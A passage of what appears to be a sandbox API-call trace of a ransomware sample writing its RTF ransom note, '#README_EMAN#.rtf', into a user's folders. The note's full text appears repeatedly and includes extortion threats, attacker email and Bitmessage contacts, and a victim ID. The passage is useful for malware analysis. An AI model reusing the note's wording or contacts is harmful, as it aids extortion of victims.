th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.444] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236ff98, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fs\x07", lpUsedDefaultChar=0x0) returned 8717 [0295.444] WriteFile (in: hFile=0x228, lpBuffer=0x236ff98*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236ff98*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.444] CloseHandle (hObject=0x228) returned 1 [0295.444] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\#readme_eman#.rtf")) returned 0xffffffff [0295.445] GetLastError () returned 0x2 [0295.445] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0295.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 